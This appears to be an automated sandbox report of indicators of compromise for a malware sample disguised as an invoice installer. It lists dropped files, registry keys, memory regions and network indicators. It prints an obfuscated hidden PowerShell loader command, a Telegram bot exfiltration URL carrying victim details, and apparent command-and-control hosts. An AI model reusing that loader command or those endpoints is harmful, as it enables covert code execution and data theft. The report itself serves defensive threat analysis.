IOC Report
REVISED INVOICE.exe

loading gif

Files

File Path
Type
Category
Malicious
REVISED INVOICE.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com
ASCII text, with very long lines (3101), with CRLF, LF line terminators
dropped
malicious
C:\Users\user\AppData\Local\fona\Kvit\REVISED INVOICE.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\k4kdogni.3gj.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\xb55l4s3.d1s.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\fona\Kvit\REVISED INVOICE.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\fona\Kvit\Smudgeproof.Spe
data
dropped
C:\Users\user\AppData\Local\fona\Kvit\Underbeat.ops
data
dropped
C:\Users\user\AppData\Local\fona\Kvit\chultun.sed
data
dropped
C:\Users\user\AppData\Local\fona\Kvit\elapoid.lux
data
dropped
C:\Users\user\AppData\Local\fona\Kvit\netadressers.hul
data
dropped
C:\Users\user\AppData\Local\fona\Kvit\organets.ind
data
dropped
C:\Users\user\AppData\Local\fona\Kvit\politurernes.jor
data
dropped
C:\Users\user\AppData\Local\fona\Kvit\prior.txt
ASCII text, with very long lines (326), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\fona\Kvit\testprocedurer.syn
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\depoh.lnk
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
dropped
There are 7 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\REVISED INVOICE.exe
"C:\Users\user\Desktop\REVISED INVOICE.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious

URLs

Name
IP
Malicious
https://duckduckgo.com/chrome_newtab
unknown
https://duckduckgo.com/ac/?q=
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
unknown
https://api.telegram.org
unknown
https://api.telegram.org/bot
unknown
http://ocsp.entrust.net03
unknown
https://drive.google.com/t
unknown
https://contoso.com/License
unknown
https://reallyfreegeoip.org/xml/173.254.250.71
188.114.97.3
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
http://varders.kozow.com:8081
unknown
http://checkip.dyndns.org/
193.122.130.0
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2010/24/2024%20/%208:39:12%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
https://drive.google.com/
unknown
https://www.google.com/search?q=wmf
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://reallyfreegeoip.org
unknown
http://checkip.dyndns.com
unknown
http://ocsp.entrust.net0D
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20a
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://reallyfreegeoip.org/xml/
unknown
http://nuget.org/NuGet.exe
unknown
http://crl.entrust.net/server1.crl0
unknown
https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://drive.usercontent.google.com/
unknown
http://checkip.dyndns.org
unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=
unknown
https://www.google.com/favicon.ico
unknown
http://aborters.duckdns.org:8081
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
https://www.google.com/sorry/index
unknown
http://anotherarmy.dns.army:8081
unknown
https://reallyfreegeoip.org
unknown
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
unknown
https://www.google.com/search?q=net
unknown
https://www.google.com/sorry/indextest
unknown
http://api.telegram.org
unknown
https://secure.comodo.com/CPS0
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
https://reallyfreegeoip.org/xml/173.254.250.714
unknown
http://crl.entrust.net/2048ca.crl0
unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
There are 40 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
reallyfreegeoip.org
188.114.97.3
malicious
api.telegram.org
149.154.167.220
malicious
checkip.dyndns.org
unknown
malicious
drive.google.com
142.250.186.142
drive.usercontent.google.com
142.250.186.97
checkip.dyndns.com
193.122.130.0

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
188.114.97.3
reallyfreegeoip.org
European Union
malicious
132.226.8.169
unknown
United States
188.114.96.3
unknown
European Union
142.250.186.142
drive.google.com
United States
193.122.130.0
checkip.dyndns.com
United States
142.250.186.97
drive.usercontent.google.com
United States
132.226.247.73
unknown
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Sprudes245\grskes
Stetoskoperede
HKEY_CURRENT_USER\terrorgruppe\Uninstall\efterladtes\lancination
fiskerkutteren
HKEY_CURRENT_USER\restaurationskknernes\personage
fluorins
HKEY_CURRENT_USER\prognosticere\Uninstall\mirabellernes\Kreditkbets177
slukningsmaterialernes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msiexec_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msiexec_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msiexec_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msiexec_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
There are 12 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
22131000
trusted library allocation
page read and write
malicious
9778000
direct allocation
page execute and read and write
malicious
22400000
trusted library allocation
page read and write
4E2E000
stack
page read and write
216C0000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
215C0000
trusted library allocation
page read and write
D70000
trusted library allocation
page read and write
3DC000
heap
page read and write
8378000
direct allocation
page execute and read and write
607000
heap
page read and write
213EF000
unkown
page read and write
2C01000
trusted library allocation
page read and write
24F0000
heap
page read and write
400000
unkown
page readonly
2164E000
stack
page read and write
2DE4000
trusted library allocation
page read and write
33F000
heap
page read and write
21570000
trusted library allocation
page read and write
7C0000
direct allocation
page read and write
1020000
direct allocation
page execute and read and write
21570000
trusted library allocation
page read and write
6570000
heap
page read and write
215C0000
trusted library allocation
page read and write
216F1000
heap
page read and write
21570000
trusted library allocation
page read and write
2E7000
heap
page read and write
21E70000
heap
page read and write
21570000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
232EC000
trusted library allocation
page read and write
462000
unkown
page read and write
88E000
stack
page read and write | page guard
4BCD000
heap
page read and write
2220E000
trusted library allocation
page read and write
215C0000
trusted library allocation
page read and write
2470E000
stack
page read and write
21560000
trusted library allocation
page read and write
222EC000
trusted library allocation
page read and write
1030000
trusted library allocation
page execute and read and write
24270000
heap
page execute and read and write
CA0000
direct allocation
page read and write
21560000
trusted library allocation
page read and write
24F0000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
23238000
trusted library allocation
page read and write
23264000
trusted library allocation
page read and write
2010000
heap
page read and write
21570000
trusted library allocation
page read and write
27D000
trusted library allocation
page execute and read and write
36A2000
trusted library allocation
page read and write
217FC000
stack
page read and write
2B0000
direct allocation
page read and write
21570000
trusted library allocation
page read and write
23266000
trusted library allocation
page read and write
2334C000
trusted library allocation
page read and write
1000000
trusted library allocation
page read and write
4ED5000
heap
page read and write
2A5000
trusted library allocation
page execute and read and write
23301000
trusted library allocation
page read and write
1010000
trusted library allocation
page read and write
215C0000
trusted library allocation
page read and write
6514000
heap
page read and write
5D22000
heap
page read and write
4B33000
trusted library allocation
page read and write
2224B000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
216B0000
trusted library allocation
page read and write
24F0000
trusted library allocation
page read and write
F00000
trusted library allocation
page read and write
240000
trusted library section
page read and write
6532000
heap
page read and write
369A000
trusted library allocation
page read and write
7D0000
direct allocation
page read and write
625E000
stack
page read and write
221EC000
trusted library allocation
page read and write
223B8000
trusted library allocation
page read and write
24F0000
heap
page read and write
6F78000
direct allocation
page execute and read and write
2149E000
stack
page read and write
24F0000
heap
page read and write
24F0000
heap
page read and write
4FAB000
stack
page read and write
22222000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
223F3000
trusted library allocation
page read and write
62A7000
heap
page read and write
21560000
trusted library allocation
page read and write
219FE000
stack
page read and write
EB0000
trusted library allocation
page read and write
2B7D000
trusted library allocation
page read and write
2335E000
trusted library allocation
page read and write
214A0000
trusted library allocation
page read and write
24C80000
heap
page read and write
23189000
trusted library allocation
page read and write
24C8A000
heap
page read and write
2A2000
trusted library allocation
page read and write
D00000
trusted library allocation
page execute and read and write
21570000
trusted library allocation
page read and write
2EA4000
heap
page read and write
60BE000
stack
page read and write
2331A000
trusted library allocation
page read and write
2BCD000
trusted library allocation
page read and write
2227C000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
3559000
trusted library allocation
page read and write
23298000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
29B000
trusted library allocation
page execute and read and write
21ECC000
heap
page read and write
890000
trusted library allocation
page read and write
223C5000
trusted library allocation
page read and write
170000
heap
page read and write
4658000
remote allocation
page execute and read and write
21570000
trusted library allocation
page read and write
4D6D000
stack
page read and write
21570000
trusted library allocation
page read and write
140000
trusted library allocation
page read and write
1060000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
FF0000
trusted library allocation
page read and write
F10000
trusted library allocation
page read and write
22369000
trusted library allocation
page read and write
23346000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
216C0000
trusted library allocation
page read and write
320000
heap
page read and write
215C0000
trusted library allocation
page read and write
530000
heap
page read and write
21560000
trusted library allocation
page read and write
221B8000
trusted library allocation
page read and write
21510000
heap
page read and write
22285000
trusted library allocation
page read and write
220DE000
stack
page read and write
3CA000
heap
page read and write
21570000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
8B0000
heap
page execute and read and write
24B6E000
stack
page read and write
730000
heap
page read and write
250000
direct allocation
page read and write
297000
trusted library allocation
page execute and read and write
280000
trusted library allocation
page read and write
2BE7000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
274000
trusted library allocation
page read and write
800000
direct allocation
page read and write
220F0000
heap
page read and write
286000
trusted library allocation
page execute and read and write
4E30000
heap
page read and write
24AAE000
stack
page read and write
444000
heap
page read and write
645D000
stack
page read and write
2F0000
direct allocation
page read and write
11C000
stack
page read and write
1F70000
heap
page read and write
6578000
heap
page read and write
21560000
trusted library allocation
page read and write
300000
heap
page read and write
222DD000
trusted library allocation
page read and write
EC0000
heap
page execute and read and write
E50000
direct allocation
page read and write
21560000
trusted library allocation
page read and write
23250000
trusted library allocation
page read and write
4DAE000
stack
page read and write
24AFE000
stack
page read and write
2220A000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
2E0000
direct allocation
page read and write
21EF4000
heap
page read and write
215C0000
trusted library allocation
page read and write
1050000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
2323E000
trusted library allocation
page read and write
24C0E000
stack
page read and write
21E40000
heap
page read and write
508E000
stack
page read and write
21570000
trusted library allocation
page read and write
3258000
remote allocation
page execute and read and write
4D0E000
stack
page read and write | page guard
EAE000
stack
page read and write
21570000
trusted library allocation
page read and write
22293000
trusted library allocation
page read and write
232F2000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
231A5000
trusted library allocation
page read and write
223ED000
trusted library allocation
page read and write
F20000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
D80000
heap
page execute and read and write
21570000
trusted library allocation
page read and write
22243000
trusted library allocation
page read and write
466000
unkown
page readonly
216A0000
trusted library allocation
page read and write
4A90000
trusted library allocation
page read and write
CB0000
direct allocation
page read and write
21560000
trusted library allocation
page read and write
215C0000
trusted library allocation
page read and write
2B37000
trusted library allocation
page read and write
600000
heap
page read and write
EE4000
heap
page execute and read and write
231E0000
trusted library allocation
page read and write
21690000
trusted library allocation
page execute and read and write
21570000
trusted library allocation
page read and write
E1E000
stack
page read and write
21570000
trusted library allocation
page read and write
500000
direct allocation
page read and write
401000
unkown
page execute read
21C8D000
stack
page read and write
331000
heap
page read and write
6CB000
heap
page read and write
21F17000
heap
page read and write
21560000
trusted library allocation
page read and write
216C0000
trusted library allocation
page read and write
21550000
trusted library allocation
page read and write
21400000
direct allocation
page read and write
221B6000
trusted library allocation
page read and write
22263000
trusted library allocation
page read and write
E20000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
221D0000
trusted library allocation
page read and write
214FE000
stack
page read and write
21570000
trusted library allocation
page read and write
240000
direct allocation
page read and write
2479E000
stack
page read and write
222A0000
trusted library allocation
page read and write
3531000
trusted library allocation
page read and write
CFE000
stack
page read and write
DC0000
trusted library allocation
page read and write
720000
trusted library allocation
page read and write
400000
heap
page read and write
258000
heap
page read and write
7BE000
stack
page read and write
23290000
trusted library allocation
page read and write
423000
heap
page read and write
18A000
stack
page read and write
24F0000
heap
page read and write
24F0000
heap
page read and write
23196000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
21ADE000
stack
page read and write
2B40000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
21690000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
22274000
trusted library allocation
page read and write
2185E000
stack
page read and write
24F0000
trusted library allocation
page read and write
820000
direct allocation
page read and write
2B6C000
trusted library allocation
page read and write
221FF000
trusted library allocation
page read and write
2A0000
trusted library allocation
page read and write
2475E000
stack
page read and write | page guard
21560000
trusted library allocation
page read and write
23161000
trusted library allocation
page read and write
63FF000
stack
page read and write
21570000
trusted library allocation
page read and write
221C1000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
64BD000
stack
page read and write
2668000
trusted library allocation
page read and write
232AA000
trusted library allocation
page read and write
231D6000
trusted library allocation
page read and write
2F1000
heap
page read and write
88F000
stack
page read and write
216D0000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
2209E000
stack
page read and write
216D0000
trusted library allocation
page read and write
21B1E000
stack
page read and write
5BFE000
stack
page read and write
708000
trusted library allocation
page read and write
2319F000
trusted library allocation
page read and write
4F2D000
heap
page read and write
24A4E000
stack
page read and write
217A0000
heap
page read and write
400000
unkown
page readonly
215C0000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
22257000
trusted library allocation
page read and write
215B0000
trusted library allocation
page read and write
248A0000
heap
page read and write
6460000
direct allocation
page execute and read and write
5FFE000
stack
page read and write
231F2000
trusted library allocation
page read and write
216C0000
trusted library allocation
page read and write
6278000
heap
page read and write
215C0000
trusted library allocation
page read and write
68E000
heap
page read and write
21560000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
222BC000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
7F0000
direct allocation
page read and write
5D00000
heap
page read and write
5D04000
heap
page read and write
246BE000
stack
page read and write
370000
heap
page read and write
407000
unkown
page readonly
23258000
trusted library allocation
page read and write
409000
unkown
page write copy
323000
heap
page read and write
21570000
trusted library allocation
page read and write
24F0000
heap
page read and write
21E7D000
heap
page read and write
22216000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
21550000
trusted library allocation
page read and write
D6F000
stack
page read and write
29A000
trusted library allocation
page execute and read and write
219AE000
stack
page read and write
22247000
trusted library allocation
page read and write
2C0000
direct allocation
page read and write
21580000
trusted library allocation
page read and write
2330E000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
2EAB000
heap
page read and write
23344000
trusted library allocation
page read and write
221D3000
trusted library allocation
page read and write
222CF000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
21580000
trusted library allocation
page execute and read and write
23292000
trusted library allocation
page read and write
215F7000
heap
page read and write
2C13000
trusted library allocation
page read and write
21EE0000
heap
page read and write
292000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
4AEE000
stack
page read and write
154000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
23318000
trusted library allocation
page read and write
216C0000
trusted library allocation
page read and write
282000
trusted library allocation
page read and write
C30000
trusted library allocation
page read and write
2176D000
stack
page read and write
4B37000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
215CF000
trusted library allocation
page read and write
665000
heap
page read and write
216C0000
trusted library allocation
page read and write
6568000
heap
page read and write
4E36000
heap
page read and write
21560000
trusted library allocation
page read and write
2D0000
direct allocation
page read and write
2C1C000
trusted library allocation
page read and write
1F74000
heap
page read and write
23288000
trusted library allocation
page read and write
2202F000
stack
page read and write
221C4000
trusted library allocation
page read and write
1F1F000
stack
page read and write
21570000
trusted library allocation
page read and write
2333C000
trusted library allocation
page read and write
230000
direct allocation
page read and write
10000
heap
page read and write
2572000
trusted library allocation
page read and write
215C0000
trusted library allocation
page read and write
216C0000
trusted library allocation
page read and write
27D000
trusted library allocation
page execute and read and write
21570000
trusted library allocation
page read and write
1A0000
heap
page read and write
6578000
direct allocation
page execute and read and write
681000
heap
page read and write
4F30000
heap
page read and write
7EF10000
trusted library allocation
page execute and read and write
757000
heap
page read and write
22358000
trusted library allocation
page read and write
3DE000
stack
page read and write
223F6000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
249DF000
stack
page read and write
624000
heap
page read and write
A178000
direct allocation
page execute and read and write
21570000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
2425E000
stack
page read and write
21590000
trusted library allocation
page read and write
3539000
trusted library allocation
page read and write
215C0000
trusted library allocation
page read and write
2BC4000
trusted library allocation
page read and write
215D0000
heap
page read and write
22376000
trusted library allocation
page read and write
247A0000
heap
page read and write
2EA8000
heap
page read and write
270000
trusted library allocation
page read and write
324000
heap
page read and write
2E0000
heap
page read and write
2168E000
stack
page read and write
216C0000
trusted library allocation
page read and write
21A9A000
stack
page read and write
2BF0000
trusted library allocation
page read and write
223B2000
trusted library allocation
page read and write
21D20000
heap
page execute and read and write
683000
heap
page read and write
89E000
unkown
page read and write
23131000
trusted library allocation
page read and write
215C0000
trusted library allocation
page read and write
2190E000
stack
page read and write
215C0000
trusted library allocation
page read and write
7E0000
direct allocation
page read and write
1A9000
heap
page read and write
2B0000
heap
page read and write
21500000
trusted library allocation
page read and write
21770000
trusted library allocation
page read and write
216C0000
trusted library allocation
page read and write
2225B000
trusted library allocation
page read and write
20000
heap
page read and write
5C5F000
stack
page read and write
21FCE000
stack
page read and write
21570000
trusted library allocation
page read and write
2EA0000
heap
page read and write
21570000
trusted library allocation
page read and write
1A0000
direct allocation
page read and write
21F7E000
stack
page read and write
21450000
direct allocation
page read and write
22351000
trusted library allocation
page read and write
2224F000
trusted library allocation
page read and write
23304000
trusted library allocation
page read and write
62BA000
heap
page read and write
21570000
trusted library allocation
page read and write
2BB2000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
216C0000
trusted library allocation
page read and write
260000
direct allocation
page read and write
2331E000
trusted library allocation
page read and write
401000
unkown
page execute read
21570000
trusted library allocation
page read and write
5B85000
stack
page read and write
1B0000
heap
page read and write
21570000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
232A7000
trusted library allocation
page read and write
5F7E000
stack
page read and write
3ED000
heap
page read and write
21570000
trusted library allocation
page read and write
EC6000
heap
page execute and read and write
8D78000
direct allocation
page execute and read and write
893000
trusted library allocation
page read and write
231E3000
trusted library allocation
page read and write
23282000
trusted library allocation
page read and write
536000
heap
page read and write
3C58000
remote allocation
page execute and read and write
2B49000
trusted library allocation
page read and write
2328A000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
4B40000
trusted library allocation
page read and write
4EF0000
heap
page read and write
2335B000
trusted library allocation
page read and write
215C0000
trusted library allocation
page read and write
215C0000
trusted library allocation
page read and write
21690000
trusted library allocation
page read and write
2B63000
trusted library allocation
page read and write
5058000
remote allocation
page execute and read and write
1040000
trusted library allocation
page read and write
21580000
trusted library allocation
page read and write
24F0000
trusted library allocation
page read and write
4E97000
heap
page read and write
4D21000
trusted library allocation
page read and write
23193000
trusted library allocation
page read and write
21A50000
heap
page read and write
215DA000
heap
page read and write
223AC000
trusted library allocation
page read and write
42B000
unkown
page read and write
231EC000
trusted library allocation
page read and write
4BB0000
heap
page read and write
4D0F000
stack
page read and write
1070000
trusted library allocation
page read and write
21580000
trusted library allocation
page read and write
216A0000
trusted library allocation
page read and write
3696000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
22409000
trusted library allocation
page read and write
215C0000
trusted library allocation
page execute and read and write
426000
unkown
page read and write
2324D000
trusted library allocation
page read and write
21C3E000
stack
page read and write
830000
direct allocation
page read and write
250000
heap
page read and write
180000
direct allocation
page read and write
1E3000
heap
page read and write
2475F000
stack
page read and write
21570000
trusted library allocation
page read and write
C90000
direct allocation
page read and write
2B5A000
trusted library allocation
page read and write
73A000
heap
page read and write
21570000
trusted library allocation
page read and write
24F0000
trusted library allocation
page read and write
DD0000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
215C0000
trusted library allocation
page read and write
2325A000
trusted library allocation
page read and write
68B000
heap
page read and write
4B62000
trusted library allocation
page read and write
21550000
trusted library allocation
page read and write
15D000
trusted library allocation
page execute and read and write
307000
heap
page read and write
24F0000
trusted library allocation
page read and write
2858000
remote allocation
page execute and read and write
21560000
trusted library allocation
page read and write
22406000
trusted library allocation
page read and write
153000
trusted library allocation
page execute and read and write
43F000
heap
page read and write
216C0000
trusted library allocation
page read and write
5A58000
remote allocation
page execute and read and write
231AB000
trusted library allocation
page read and write
434000
unkown
page read and write
21570000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
24F0000
heap
page read and write
283000
trusted library allocation
page read and write
4EAF000
heap
page read and write
22201000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
2202E000
stack
page read and write | page guard
216B0000
trusted library allocation
page execute and read and write
2326A000
trusted library allocation
page read and write
3FF000
heap
page read and write
190000
direct allocation
page read and write
23312000
trusted library allocation
page read and write
87000
stack
page read and write
21560000
trusted library allocation
page read and write
2C0A000
trusted library allocation
page read and write
61DE000
stack
page read and write
810000
direct allocation
page read and write
21560000
trusted library allocation
page read and write
51FB000
stack
page read and write
223B5000
trusted library allocation
page read and write
628C000
heap
page read and write
28A000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
2144D000
stack
page read and write
223BF000
trusted library allocation
page read and write
21E50000
heap
page read and write
407000
unkown
page readonly
21720000
trusted library allocation
page execute and read and write
4B30000
trusted library allocation
page read and write
21968000
stack
page read and write
23336000
trusted library allocation
page read and write
45B0000
trusted library allocation
page execute and read and write
223F9000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
280000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
33A000
heap
page read and write
22F0000
heap
page read and write
21560000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
3708000
trusted library allocation
page read and write
2325E000
trusted library allocation
page read and write
D20000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
C80000
direct allocation
page read and write
215C0000
trusted library allocation
page read and write
24F0000
heap
page read and write
21570000
trusted library allocation
page read and write
150000
trusted library allocation
page read and write
215A0000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
24F0000
heap
page read and write
2BDE000
trusted library allocation
page read and write
64FE000
stack
page read and write
7EF28000
trusted library allocation
page execute and read and write
2EE000
heap
page read and write
21570000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
897000
trusted library allocation
page read and write
160000
direct allocation
page read and write
24C7E000
stack
page read and write
213F0000
remote allocation
page read and write
24EF000
stack
page read and write
5C5E000
stack
page read and write | page guard
466000
unkown
page readonly
213F0000
remote allocation
page read and write
C7000
stack
page read and write
6260000
heap
page read and write
273000
trusted library allocation
page execute and read and write
4630000
trusted library allocation
page execute and read and write
216C0000
trusted library allocation
page read and write
22253000
trusted library allocation
page read and write
2330C000
trusted library allocation
page read and write
214B0000
trusted library allocation
page execute and read and write
41D000
heap
page read and write
21550000
trusted library allocation
page read and write
4EE7000
heap
page read and write
21570000
trusted library allocation
page read and write
222F4000
trusted library allocation
page read and write
2D0000
trusted library allocation
page execute and read and write
22212000
trusted library allocation
page read and write
295000
trusted library allocation
page execute and read and write
21560000
trusted library allocation
page read and write
2225F000
trusted library allocation
page read and write
22378000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
215C0000
trusted library allocation
page read and write
2333E000
trusted library allocation
page read and write
2240C000
trusted library allocation
page read and write
6560000
heap
page read and write
21CA0000
heap
page execute and read and write
270000
trusted library allocation
page read and write
215C0000
trusted library allocation
page read and write
10000
heap
page read and write
216D0000
trusted library allocation
page read and write
4F1F000
heap
page read and write
221C7000
trusted library allocation
page read and write
2BBB000
trusted library allocation
page read and write
1C0000
heap
page read and write
C7D000
stack
page read and write
218AD000
stack
page read and write
24F0000
trusted library allocation
page read and write
223C8000
trusted library allocation
page read and write
1B0000
trusted library section
page read and write
1E58000
remote allocation
page execute and read and write
D10000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
409000
unkown
page read and write
215C0000
trusted library allocation
page read and write
467E000
stack
page read and write
231F7000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
2B2E000
trusted library allocation
page read and write
1D40000
remote allocation
page execute and read and write
2230D000
trusted library allocation
page read and write
24F0000
heap
page read and write
7978000
direct allocation
page execute and read and write
221B3000
trusted library allocation
page read and write
21E00000
heap
page read and write
F6F000
stack
page read and write
10000
heap
page read and write
21570000
trusted library allocation
page read and write
304000
heap
page read and write
216E0000
heap
page read and write
365000
heap
page read and write
2236F000
trusted library allocation
page read and write
2235C000
trusted library allocation
page read and write
21570000
trusted library allocation
page read and write
4B3B000
trusted library allocation
page read and write
230D000
heap
page read and write
5D40000
heap
page read and write
22267000
trusted library allocation
page read and write
21560000
trusted library allocation
page read and write
2B6000
heap
